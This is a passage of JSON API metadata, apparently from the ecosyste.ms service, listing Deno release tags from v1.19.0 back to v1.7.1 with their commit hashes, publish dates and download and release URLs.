/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/